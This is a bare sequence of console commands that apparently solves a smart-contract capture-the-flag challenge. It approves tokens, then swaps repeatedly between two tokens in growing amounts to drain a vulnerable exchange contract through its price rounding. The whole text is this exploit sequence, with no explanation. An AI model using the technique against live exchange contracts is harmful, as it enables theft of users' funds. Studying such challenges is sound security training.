# Command: <br />
1. await contract.approve(contract.address, 500) <br />
2. t1 = await contract.token1() <br />
3. t2 = await contract.token2() <br />
4. await contract.swap(t1, t2, 10) <br />
5. await contract.swap(t2, t1, 20) <br />
6. await contract.swap(t1, t2, 24) <br />
7. await contract.swap(t2, t1, 30) <br />
8. await contract.swap(t1, t2, 41) <br />
9. await contract.swap(t2, t1, 45) <br />